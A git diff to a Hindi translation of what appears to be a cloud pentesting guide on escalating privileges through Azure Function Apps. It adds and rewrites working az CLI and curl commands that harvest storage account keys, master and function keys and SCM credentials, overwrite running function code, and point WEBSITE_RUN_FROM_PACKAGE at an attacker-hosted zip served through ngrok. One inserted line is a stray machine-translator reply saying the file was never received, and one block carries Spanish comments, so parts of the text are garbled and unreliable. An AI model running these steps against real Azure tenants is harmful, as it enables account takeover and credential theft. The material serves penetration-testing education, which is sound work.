diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index 5ad76c383..68a90abd6 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md @@ -4,7 +4,7 @@ ## Function Apps -अधिक जानकारी के लिए निम्नलिखित पृष्ठ की जांच करें: +अधिक जानकारी के लिए निम्न पृष्ठ देखें: {{#ref}} ../az-services/az-function-apps.md @@ -12,26 +12,26 @@ ### Bucket Read/Write -यदि आपके पास उस Storage Account के अंदर कंटेनरों को पढ़ने की अनुमति है जो फ़ंक्शन डेटा को स्टोर करता है, तो आप **विभिन्न कंटेनरों** (कस्टम या पूर्व-निर्धारित नामों के साथ) को खोज सकते हैं जो **फ़ंक्शन द्वारा निष्पादित कोड** को समाहित कर सकते हैं। +Storage Account के अंदर जो containers होते हैं जो Function data को स्टोर करते हैं उन्हें पढ़ने की permissions होने पर आप **विभिन्न कंटेनर** (custom या pre-defined names वाले) खोज सकते हैं जो संभवतः **Function द्वारा निष्पादित कोड** को contain करते हों। -एक बार जब आप यह पता लगा लेते हैं कि फ़ंक्शन का कोड कहाँ स्थित है, यदि आपके पास उस पर लिखने की अनुमति है, तो आप फ़ंक्शन को कोई भी कोड निष्पादित करने के लिए बना सकते हैं और फ़ंक्शन से जुड़े प्रबंधित पहचान के लिए विशेषाधिकार बढ़ा सकते हैं। +एक बार जब आप पता लगा लें कि Function का कोड कहाँ स्थित है और आपके पास उस पर write permissions हैं, तो आप Function को किसी भी कोड को execute करने के लिए मजबूर कर सकते हैं और Function से जुड़े managed identities के privileges escalate कर सकते हैं। -- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` और `WEBSITE_CONTENTSHARE`) +- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)` -फ़ंक्शन का कोड आमतौर पर एक फ़ाइल शेयर के अंदर संग्रहीत होता है। पर्याप्त पहुंच के साथ, कोड फ़ाइल को संशोधित करना और **फ़ंक्शन को मनमाने कोड को लोड करने** के लिए बनाना संभव है, जिससे फ़ंक्शन से जुड़े प्रबंधित पहचान के लिए विशेषाधिकार बढ़ाना संभव हो जाता है। +Function का कोड आमतौर पर एक file share के अंदर स्टोर रहता है। पर्याप्त access होने पर कोड फ़ाइल में संशोधन कर के आप **Function को मनमाना कोड लोड करवाना** संभव कर सकते हैं, जिससे Function से जुड़े managed identities के privileges escalate हो सकें। -यह तैनाती विधि आमतौर पर सेटिंग्स **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** और **`WEBSITE_CONTENTSHARE`** को कॉन्फ़िगर करती है, जिसे आप प्राप्त कर सकते हैं +This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** जिन्हें आप प्राप्त कर सकते हैं ```bash az functionapp config appsettings list \ --name \ --resource-group ``` -वे कॉन्फ़िगरेशन **स्टोरेज अकाउंट की** को शामिल करेंगे जिसका उपयोग फ़ंक्शन को कोड तक पहुँचने के लिए किया जा सकता है। +ये कॉन्फ़िग्स में वह **Storage Account Key** होगी जिसका उपयोग Function कोड तक पहुँचने के लिए कर सकता है। > [!CAUTION] -> फ़ाइल शेयर से कनेक्ट करने और **स्क्रिप्ट को संशोधित करने** के लिए पर्याप्त अनुमति के साथ, फ़ंक्शन में मनमाना कोड निष्पादित करना और विशेषाधिकार बढ़ाना संभव है। +> पर्याप्त अनुमति होने पर File Share से कनेक्ट करके और चल रही स्क्रिप्ट को **modify the script** करने पर Function में arbitrary code निष्पादित करना और privileges escalate करना संभव है। -निम्नलिखित उदाहरण macOS का उपयोग करके फ़ाइल शेयर से कनेक्ट करता है, लेकिन फ़ाइल शेयरों के बारे में अधिक जानकारी के लिए निम्नलिखित पृष्ठ की जांच करना भी अनुशंसित है: +निम्न उदाहरण macOS का उपयोग करके file share से कनेक्ट करने का तरीका दिखाता है, लेकिन file shares के बारे में और जानकारी के लिए निम्न पृष्ठ भी देखें: {{#ref}} ../az-services/az-file-shares.md @@ -47,26 +47,26 @@ open "smb://.file.core.windows.net/" ``` - **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`) -यह सामान्य है कि **zip releases** को उस फ़ोल्डर `function-releases` के अंदर पाया जाए जो Storage Account कंटेनर में है जिसका उपयोग फ़ंक्शन ऐप कर रहा है, **जो आमतौर पर `function-releases`** कहलाता है। +अक्सर `function-releases` फोल्डर के अंदर, उस Storage Account container में जो function app उपयोग कर रहा होता है, **zip releases** मिलती हैं — आमतौर पर यह container `function-releases` नाम का होता है। -आमतौर पर, यह तैनाती विधि `WEBSITE_RUN_FROM_PACKAGE` कॉन्फ़िग सेट करेगी: +आम तौर पर यह deployment method `WEBSITE_RUN_FROM_PACKAGE` config को निम्न में सेट कर देता है: ```bash az functionapp config appsettings list \ --name \ --resource-group ``` -यह कॉन्फ़िगरेशन आमतौर पर **SAS URL को डाउनलोड करने के लिए** स्टोरेज अकाउंट से कोड प्राप्त करने के लिए शामिल होगा। +This config will usually contain a **SAS URL to download** the code from the Storage Account. > [!CAUTION] -> यदि ब्‍लॉब कंटेनर से कनेक्‍ट करने के लिए पर्याप्‍त अनुमति है जो **कोड को ज़िप में शामिल करता है**, तो फ़ंक्‍शन में मनमाना कोड निष्‍पादित करना और विशेषाधिकार बढ़ाना संभव है। +> blob container से कनेक्ट करने की पर्याप्त अनुमति होने पर जो **contains the code in zip** है, Function में arbitrary code execute करके privileges escalate करना संभव है। -- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` +- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE`) -पिछले मामले की तरह, यदि तैनाती Github Actions के माध्यम से की जाती है, तो स्टोरेज अकाउंट में **`github-actions-deploy`** फ़ोल्डर खोजना संभव है जिसमें कोड का ज़िप और सेटिंग `WEBSITE_RUN_FROM_PACKAGE` में ज़िप के लिए एक SAS URL शामिल है। +पिछले केस की तरह, अगर deployment Github Actions के माध्यम से किया गया है तो Storage Account में **`github-actions-deploy`** फोल्डर पाया जा सकता है जो कोड का zip रखता है और setting `WEBSITE_RUN_FROM_PACKAGE` में उस zip का SAS URL होता है। -- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` और `WEBSITE_CONTENTSHARE`) +- **`scm-releases`**(`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`) -स्टोरेज अकाउंट के अंदर फ़ंक्‍शन डेटा को संग्रहीत करने वाले कंटेनरों को पढ़ने के लिए अनुमतियों के साथ, **`scm-releases`** कंटेनर खोजना संभव है। वहाँ, **Squashfs फ़ाइल प्रणाली फ़ाइल प्रारूप** में नवीनतम रिलीज़ खोजना संभव है और इसलिए फ़ंक्‍शन के कोड को पढ़ना संभव है: +function data संग्रहीत करने वाले Storage Account के अंदर के containers पढ़ने की permissions होने पर **`scm-releases`** container पाया जा सकता है। वहाँ आप latest release **Squashfs filesystem file format** में पा सकते हैं और इसलिए function का code पढ़ना संभव है: ```bash # List containers inside the storage account of the function app az storage container list \ @@ -98,10 +98,10 @@ unsquashfs -l "/tmp/scm-latest-.zip" mkdir /tmp/fs unsquashfs -d /tmp/fs /tmp/scm-latest-.zip ``` -यह भी संभव है कि **मास्टर और फ़ंक्शन कुंजी** को स्टोरेज खाते में **`azure-webjobs-secrets`** कंटेनर में **``** फ़ोल्डर के अंदर JSON फ़ाइलों में संग्रहीत किया गया हो। +It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside. > [!CAUTION] -> यदि ब्लॉब कंटेनर से कनेक्ट करने के लिए पर्याप्त अनुमति है जो **कोड को ज़िप एक्सटेंशन फ़ाइल** में रखता है (जो वास्तव में एक **`squashfs`** है), तो फ़ंक्शन में मनमाना कोड निष्पादित करना और विशेषाधिकार बढ़ाना संभव है। +> blob container से कनेक्ट करने के लिए पर्याप्त अनुमति होने पर, जो **contains the code in a zip extension file** (जो वास्तव में एक **`squashfs`** है), Function में arbitrary code execute करना और privileges escalate करना संभव है। ```bash # Modify code inside the script in /tmp/fs adding your code @@ -118,11 +118,11 @@ az storage blob upload \ ``` ### `Microsoft.Web/sites/host/listkeys/action` -यह अनुमति निर्दिष्ट फ़ंक्शन के फ़ंक्शन, मास्टर और सिस्टम कुंजियों को सूचीबद्ध करने की अनुमति देती है, लेकिन होस्ट कुंजी नहीं। +यह अनुमति निर्दिष्ट function की function, master और system keys को सूचीबद्ध करने की अनुमति देती है, लेकिन host key को नहीं, निम्न के साथ: ```bash az functionapp keys list --resource-group --name ``` -मास्टर कुंजी के साथ, एक URL में स्रोत कोड प्राप्त करना भी संभव है: +master key के साथ यह भी संभव है कि source code को ऐसे URL से प्राप्त किया जा सके, जैसे: ```bash # Get "script_href" from az rest --method GET \ @@ -130,70 +130,91 @@ az rest --method GET \ # Access curl "?code=" -## Python example: +# Python function app example curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v +# JavaScript function app example +curl "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" -v ``` -और **कार्य में निष्पादित हो रहे कोड को बदलने के लिए**: +और फ़ंक्शन में **निष्पादित हो रहे कोड को बदलने** के लिए: ```bash # Set the code to set in the function in /tmp/function_app.py -## The following continues using the python example +## Python function app example curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \ --data-binary @/tmp/function_app.py \ -H "Content-Type: application/json" \ -H "If-Match: *" \ -v + +# NodeJS function app example +curl -X PUT "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" \ +--data-binary @/tmp/index.js \ +-H "Content-Type: application/json" \ +-H "If-Match: *" \ +-v ``` ### `Microsoft.Web/sites/functions/listKeys/action` -यह अनुमति निर्दिष्ट फ़ंक्शन की होस्ट कुंजी प्राप्त करने की अनुमति देती है: +यह अनुमति निर्दिष्ट function की default key प्राप्त करने की अनुमति देती है: ```bash az rest --method POST --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//listKeys?api-version=2022-03-01" ``` +प्राप्त डिफ़ॉल्ट कुंजी का उपयोग करके फ़ंक्शन को चलाएँ: +```bash +curl "https://.azurewebsites.net/api/?code=" +``` ### `Microsoft.Web/sites/host/functionKeys/write` -यह अनुमति निर्दिष्ट फ़ंक्शन की फ़ंक्शन कुंजी बनाने/अपडेट करने की अनुमति देती है: +यह अनुमति निर्दिष्ट फ़ंक्शन की function key को निम्न के साथ बनाने/अपडेट करने की अनुमति देती है: ```bash az functionapp keys set --resource-group --key-name --key-type functionKeys --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` ### `Microsoft.Web/sites/host/masterKey/write` -यह अनुमति निर्दिष्ट फ़ंक्शन के लिए मास्टर कुंजी बनाने/अपडेट करने की अनुमति देती है: +यह permission निर्दिष्ट function के लिए master key बनाने/अपडेट करने की अनुमति देती है: ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` > [!CAUTION] -> याद रखें कि इस कुंजी के साथ आप स्रोत कोड तक भी पहुँच सकते हैं और इसे पहले बताए अनुसार संशोधित कर सकते हैं! +> याद रखें कि इस key के साथ आप स्रोत कोड तक भी पहुँच कर उसे पहले बताए गए अनुसार संशोधित कर सकते हैं! ### `Microsoft.Web/sites/host/systemKeys/write` -यह अनुमति निर्दिष्ट फ़ंक्शन के लिए एक सिस्टम फ़ंक्शन कुंजी बनाने/अपडेट करने की अनुमति देती है: +यह permission निर्दिष्ट function के लिए system function key create/update करने की अनुमति देता है: ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` +मैंने उस फ़ाइल की सामग्री प्राप्त नहीं की है। कृपया src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md की सामग्री या "key" यहाँ पेस्ट करें ताकि मैं उसे हिंदी में अनुवाद कर सकूं। +```bash +# Ejemplo: Acceso a endpoints de Durable Functions +curl "https://.azurewebsites.net/runtime/webhooks/durabletask/instances?code=" + +# Ejemplo: Acceso a Event Grid webhooks +curl "https://.azurewebsites.net/runtime/webhooks/eventgrid?code=" +``` ### `Microsoft.Web/sites/config/list/action` -यह अनुमति एक फ़ंक्शन की सेटिंग्स प्राप्त करने की अनुमति देती है। इन कॉन्फ़िगरेशन के अंदर, यह संभव है कि **`AzureWebJobsStorage`** या **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** के डिफ़ॉल्ट मान मिलें, जिसमें **ब्लॉब स्टोरेज तक FULL अनुमतियों के साथ पहुँच के लिए एक खाता कुंजी** होती है। +यह अनुमति किसी फ़ंक्शन की सेटिंग्स प्राप्त करने देती है। इन कॉन्फ़िगरेशन में डिफ़ॉल्ट मान **`AzureWebJobsStorage`** या **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** मिल सकते हैं, जो फ़ंक्शन के blob storage तक FULL permissions के साथ एक्सेस करने के लिए एक account key रखते हैं। ```bash az functionapp config appsettings list --name --resource-group ``` -इसके अलावा, यह अनुमति **SCM उपयोगकर्ता नाम और पासवर्ड** (यदि सक्षम हो) प्राप्त करने की भी अनुमति देती है: +इसके अलावा, यह अनुमति (यदि सक्षम हो) **SCM username and password** प्राप्त करने की अनुमति भी देती है: ```bash az rest --method POST \ --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/publishingcredentials/list?api-version=2018-11-01" ``` ### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/write` -ये अनुमतियाँ एक फ़ंक्शन के कॉन्फ़िगरेशन मानों को सूचीबद्ध करने की अनुमति देती हैं जैसा कि हमने पहले देखा था, साथ ही **इन मानों को संशोधित करने** की भी। यह उपयोगी है क्योंकि ये सेटिंग्स यह संकेत करती हैं कि फ़ंक्शन के अंदर निष्पादित होने वाला कोड कहाँ स्थित है। +ये permissions एक function के config values को सूचीबद्ध करने की अनुमति देती हैं जैसा कि पहले देखा गया था, और साथ ही आप इन्हें **इन मानों को संशोधित कर सकते हैं**। यह उपयोगी है क्योंकि ये सेटिंग्स बताती हैं कि function के अंदर execute होने वाला code कहाँ स्थित है। -इसलिए यह संभव है कि सेटिंग का मान **`WEBSITE_RUN_FROM_PACKAGE`** को एक URL ज़िप फ़ाइल की ओर इंगित किया जाए जिसमें एक वेब एप्लिकेशन के अंदर निष्पादित होने के लिए नया कोड हो: +इसलिए यह संभव है कि आप setting **`WEBSITE_RUN_FROM_PACKAGE`** का मान उस URL zip फ़ाइल की ओर सेट करें जिसमें वेब एप्लिकेशन के अंदर execute करने के लिए नया code होता है: -- वर्तमान कॉन्फ़िगरेशन प्राप्त करने से शुरू करें +- शुरू करने के लिए पहले वर्तमान config प्राप्त करें ```bash az functionapp config appsettings list \ --name \ --resource-group ``` -- वह कोड बनाएं जिसे आप फ़ंक्शन को चलाना चाहते हैं और इसे सार्वजनिक रूप से होस्ट करें +- उस code को बनाएं जिसे आप function द्वारा चलाना चाहते हैं और इसे सार्वजनिक रूप से होस्ट करें ```bash # Write inside /tmp/web/function_app.py the code of the function cd /tmp/web/function_app.py @@ -203,9 +224,9 @@ python3 -m http.server # Serve it using ngrok for example ngrok http 8000 ``` -- फ़ंक्शन को संशोधित करें, पिछले पैरामीटर को बनाए रखें और अंत में **`WEBSITE_RUN_FROM_PACKAGE`** कॉन्फ़िगरेशन जोड़ें जो कोड के साथ **zip** वाली URL की ओर इशारा करता है। +- फ़ंक्शन में संशोधन करें, पिछले पैरामीटर्स को रखें और अंत में कॉन्फ़िग **`WEBSITE_RUN_FROM_PACKAGE`** जोड़ें जो कोड वाले **zip** के URL की ओर इशारा करे। -निम्नलिखित मेरे **अपने सेटिंग्स का एक उदाहरण है, आपको अपने लिए मान बदलने की आवश्यकता होगी**, अंत में मान `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` है, यहाँ मैंने ऐप को होस्ट किया था। +The following is an example of my **मेरी अपनी सेटिंग्स हैं; आपको इनके मान अपने अनुसार बदलने होंगे**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, this is where I was hosting the app. ```bash # Modify the function az rest --method PUT \ @@ -215,7 +236,7 @@ az rest --method PUT \ ``` ### `Microsoft.Web/sites/hostruntime/vfs/write` -इस अनुमति के साथ **किसी एप्लिकेशन के कोड को वेब कंसोल के माध्यम से संशोधित करना संभव है** (या निम्नलिखित API एंडपॉइंट के माध्यम से): +इस अनुमति के साथ यह **संभव है कि किसी एप्लिकेशन के कोड में बदलाव किया जा सके** वेब कंसोल के माध्यम से (या निम्नलिखित API endpoint के जरिए): ```bash # This is a python example, so we will be overwritting function_app.py # Store in /tmp/body the raw python code to put in the function @@ -223,10 +244,29 @@ az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \ --headers '{"Content-Type": "application/json", "If-Match": "*"}' \ --body @/tmp/body + +# Through the SCM URL (using Azure permissions or SCM creds) +az rest --method PUT \ +--url "https://consumptionexample.scm.azurewebsites.net/api/vfs/site/wwwroot/HttpExample/index.js" \ +--resource "https://management.azure.com/" \ +--headers "If-Match=*" \ +--body 'module.exports = async function (context, req) { +context.log("JavaScript HTTP trigger function processed a request. Training Demo 2"); + +const name = (req.query.name || (req.body && req.body.name)); +const responseMessage = name +? "Hello, " + name + ". This HTTP triggered function executed successfully. Training Demo 2" +: "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. Training Demo 2"; + +context.res = { +// status: 200, /* Defaults to 200 */ +body: responseMessage +}; +}' ``` ### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`) -यह अनुमति सभी प्रकाशन प्रोफाइल को सूचीबद्ध करने की अनुमति देती है, जो मूल रूप से **बुनियादी प्रमाणीकरण क्रेडेंशियल** शामिल करती है: +यह अनुमति सभी publishing profiles को सूचीबद्ध करने की अनुमति देती है, जो मूल रूप से **basic auth credentials** होते हैं: ```bash # Get creds az functionapp deployment list-publishing-profiles \ @@ -234,15 +274,15 @@ az functionapp deployment list-publishing-profiles \ --resource-group \ --output json ``` -एक और विकल्प होगा कि आप अपनी खुद की क्रेडेंशियल्स सेट करें और उनका उपयोग करें: +एक और विकल्प होगा अपने creds सेट करना और उनका उपयोग करना: ```bash az functionapp deployment user set \ --user-name DeployUser123456 g \ --password 'P@ssw0rd123!' ``` -- यदि **REDACTED** क्रेडेंशियल्स +- यदि **REDACTED** credentials -यदि आप देखते हैं कि वे क्रेडेंशियल्स **REDACTED** हैं, तो इसका मतलब है कि आपको **SCM बेसिक ऑथेंटिकेशन विकल्प को सक्षम करने की आवश्यकता है** और इसके लिए आपको दूसरी अनुमति की आवश्यकता है (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` +यदि आप देखते हैं कि वे credentials **REDACTED** हैं, तो इसका कारण यह है कि आपको **SCM basic authentication option को सक्षम करने** की आवश्यकता है और इसके लिए आपको दूसरा permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` की आवश्यकता है। ```bash # Enable basic authentication for SCM az rest --method PUT \ @@ -262,9 +302,9 @@ az rest --method PUT \ } } ``` -- **Method SCM** +- **विधि SCM** -फिर, आप अपने फ़ंक्शन ऐप के SCM URL पर इन **बुनियादी प्रमाणीकरण क्रेडेंशियल्स** के साथ पहुँच सकते हैं और env वेरिएबल्स के मान प्राप्त कर सकते हैं: +फिर, आप इन **basic auth credentials** के साथ अपने function app के SCM URL पर पहुँच सकते हैं और env variables के मान प्राप्त कर सकते हैं: ```bash # Get settings values curl -u ':' \ @@ -275,15 +315,15 @@ zip function_app.zip function_app.py # Your code in function_app.py curl -u ':' -X POST --data-binary "@" \ https://.scm.azurewebsites.net/api/zipdeploy ``` -_ध्यान दें कि **SCM उपयोगकर्ता नाम** आमतौर पर वर्ण "$" के बाद ऐप का नाम होता है, इसलिए: `$`._ +_ध्यान दें कि **SCM username** आमतौर पर '$' अक्षर होता है, उसके बाद ऐप का नाम आता है, इसलिए: `$`._ -आप `https://.scm.azurewebsites.net/BasicAuth` से वेब पृष्ठ तक भी पहुँच सकते हैं। +आप इस वेब पेज तक इस URL से भी पहुँच सकते हैं: `https://.scm.azurewebsites.net/BasicAuth` -सेटिंग्स मानों में उस स्टोरेज खाते का **AccountKey** शामिल होता है जो फ़ंक्शन ऐप के डेटा को संग्रहीत करता है, जिससे उस स्टोरेज खाते को नियंत्रित किया जा सकता है। +Settings मानों में function app के डेटा को स्टोर करने वाले storage account का **AccountKey** होता है, जिससे उस storage account को नियंत्रित किया जा सकता है। -- **विधि FTP** +- **तरीका FTP** -FTP सर्वर से कनेक्ट करें: +FTP सर्वर से कनेक्ट करने के लिए: ```bash # macOS install lftp brew install lftp @@ -297,19 +337,19 @@ ls # List get ./function_app.py -o /tmp/ # Download function_app.py in /tmp put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it ``` -_ध्यान दें कि **FTP उपयोगकर्ता नाम** आमतौर पर इस प्रारूप में होता है \\\$\._ +_ध्यान दें कि **FTP username** आमतौर पर प्रारूप \\\$\ में होता है._ ### `Microsoft.Web/sites/hostruntime/vfs/read` -यह अनुमति **VFS के माध्यम से ऐप का स्रोत कोड पढ़ने** की अनुमति देती है: +यह अनुमति VFS के माध्यम से app का **स्रोत कोड पढ़ने** की अनुमति देती है: ```bash az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` ### `Microsoft.Web/sites/functions/token/action` -इस अनुमति के साथ यह संभव है [**व्यवस्थापक टोकन** प्राप्त करें](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) जिसे बाद में **मास्टर कुंजी** प्राप्त करने के लिए उपयोग किया जा सकता है और इसलिए फ़ंक्शन के कोड को एक्सेस और संशोधित किया जा सकता है। +इस अनुमति के साथ आप [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) प्राप्त कर सकते हैं, जिसका उपयोग बाद में **master key** प्राप्त करने और इसलिए function's code तक पहुँचने व उसे संशोधित करने के लिए किया जा सकता है। -हालांकि, मेरी अंतिम जांचों में कोई टोकन वापस नहीं किया गया, इसलिए यह संभव है कि यह अक्षम हो या अब काम न कर रहा हो, लेकिन यहाँ यह है कि आप इसे कैसे करेंगे: +हालाँकि, मेरी हाल की जाँचों में कोई token वापस नहीं आया, इसलिए यह disabled हो सकता है या अब काम नहीं कर रहा हो, पर यहाँ बताया गया है कि आप इसे कैसे करेंगे: ```bash # Get admin token az rest --method GET \ @@ -321,7 +361,7 @@ curl "https://.azurewebsites.net/admin/host/systemkeys/_master" \ ``` ### `Microsoft.Web/sites/config/write`, (`Microsoft.Web/sites/functions/properties/read`) -यह अनुमति **फंक्शंस को सक्षम** करने की अनुमति देती है जो कि अक्षम हो सकते हैं (या उन्हें अक्षम कर सकती है)। +यह अनुमति उन फ़ंक्शंस को सक्षम करने (या अक्षम करने) की अनुमति देती है जो निष्क्रिय हो सकती हैं। ```bash # Enable a disabled function az functionapp config appsettings set \ @@ -329,13 +369,13 @@ az functionapp config appsettings set \ --resource-group \ --settings "AzureWebJobs.http_trigger1.Disabled=false" ``` -यह भी संभव है कि आप निम्नलिखित URL में देखें कि कोई फ़ंक्शन सक्षम है या अक्षम (कोष्ठक में अनुमति का उपयोग करते हुए): +यह भी देखा जा सकता है कि कोई function सक्षम है या अक्षम निम्न URL में (parenthesis में दिए गए permission का उपयोग करके): ```bash az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//properties/state?api-version=2024-04-01" ``` ### `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`) -इन अनुमतियों के साथ, यह संभव है कि **एक फ़ंक्शन ऐप द्वारा चलाए जा रहे कंटेनर को संशोधित किया जा सके** जिसे एक कंटेनर चलाने के लिए कॉन्फ़िगर किया गया है। इससे एक हमलावर को एक दुर्भावनापूर्ण azure फ़ंक्शन कंटेनर ऐप को डॉकर हब (उदाहरण के लिए) पर अपलोड करने और फ़ंक्शन को इसे निष्पादित करने की अनुमति मिलेगी। +इन permissions के साथ यह संभव है कि आप **function app द्वारा चलाए जा रहे container को संशोधित** कर सकें, जो container चलाने के लिए configured है। इससे एक attacker एक malicious azure function container app को docker hub (for example) पर upload करके function को इसे चलाने के लिए मजबूर कर सकता है। ```bash az functionapp config container set --name \ --resource-group \ @@ -343,29 +383,29 @@ az functionapp config container set --name \ ``` ### `Microsoft.Web/sites/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/operationresults/read`) -इन अनुमतियों के साथ, **एक नए उपयोगकर्ता प्रबंधित पहचान को एक फ़ंक्शन से जोड़ा जा सकता है**। यदि फ़ंक्शन से समझौता किया गया था, तो यह किसी भी उपयोगकर्ता प्रबंधित पहचान के लिए विशेषाधिकार बढ़ाने की अनुमति देगा। +इन permissions के साथ यह संभव है कि किसी function पर एक नया user managed identity attach किया जा सके। यदि function compromised हो गया हो तो इससे किसी भी user managed identity के privileges escalate किए जा सकेंगे। ```bash az functionapp identity assign \ --name \ --resource-group \ --identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ ``` -### Remote Debugging +### रिमोट डिबगिंग -यह भी संभव है कि एक चल रहे Azure फ़ंक्शन को [**दस्तावेज़ों में समझाया गया**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs) के रूप में डिबग करने के लिए कनेक्ट किया जाए। हालाँकि, डिफ़ॉल्ट रूप से Azure इस विकल्प को 2 दिनों में बंद कर देगा यदि डेवलपर कमजोर कॉन्फ़िगरेशन छोड़ने से बचने के लिए भूल जाता है। +एक चल रही Azure function को डिबग करने के लिए कनेक्ट करना भी संभव है जैसा कि [**explained in the docs**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). हालाँकि, डिफ़ॉल्ट रूप से Azure इस विकल्प को 2 दिनों में बंद कर देगा ताकि अगर डेवलपर भूल जाए तो कमजोर कॉन्फ़िगरेशन न रह जाएँ। -यह जांचना संभव है कि क्या किसी फ़ंक्शन में डिबगिंग सक्षम है: +यह जांचना संभव है कि किसी Function में debugging सक्षम है या नहीं, इसके लिए: ```bash az functionapp show --name --resource-group ``` -`Microsoft.Web/sites/config/write` अनुमति होने पर, एक फ़ंक्शन को डिबगिंग मोड में डालना भी संभव है (निम्नलिखित कमांड को भी `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` और `Microsoft.Web/sites/Read` अनुमतियों की आवश्यकता होती है)। +यदि आपके पास अनुमति `Microsoft.Web/sites/config/write` है, तो किसी function को debugging mode में डालना भी संभव है (निम्नलिखित command के लिए `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` और `Microsoft.Web/sites/Read` अनुमतियाँ भी आवश्यक हैं)। ```bash az functionapp config set --remote-debugging-enabled=True --name --resource-group ``` ### Change Github repo -मैंने निम्नलिखित कमांड्स को निष्पादित करके उस Github रिपॉजिटरी को बदलने की कोशिश की जहाँ से डिप्लॉयमेंट हो रहा है, लेकिन भले ही यह बदल गया, **नया कोड लोड नहीं हुआ** (संभवतः क्योंकि यह Github Action से कोड को अपडेट करने की उम्मीद कर रहा है)।\ -इसके अलावा, **प्रबंधित पहचान संघीय क्रेडेंशियल अपडेट नहीं हुआ** जिससे नई रिपॉजिटरी की अनुमति नहीं मिली, इसलिए यह बहुत उपयोगी नहीं लगता। +मैंने उस Github repo को बदलने की कोशिश की जहाँ से deploying हो रहा था, निम्न commands चलाकर, लेकिन भले ही यह बदल भी गया, **नया कोड लोड नहीं हुआ था** (शायद क्योंकि यह Github Action से कोड अपडेट होने की उम्मीद कर रहा था).\ +इसके अलावा, **managed identity federated credential को नए repository को अनुमति देने के लिए अपडेट नहीं किया गया था**, इसलिए लगता है कि यह बहुत उपयोगी नहीं है। ```bash # Remove current az functionapp deployment source delete \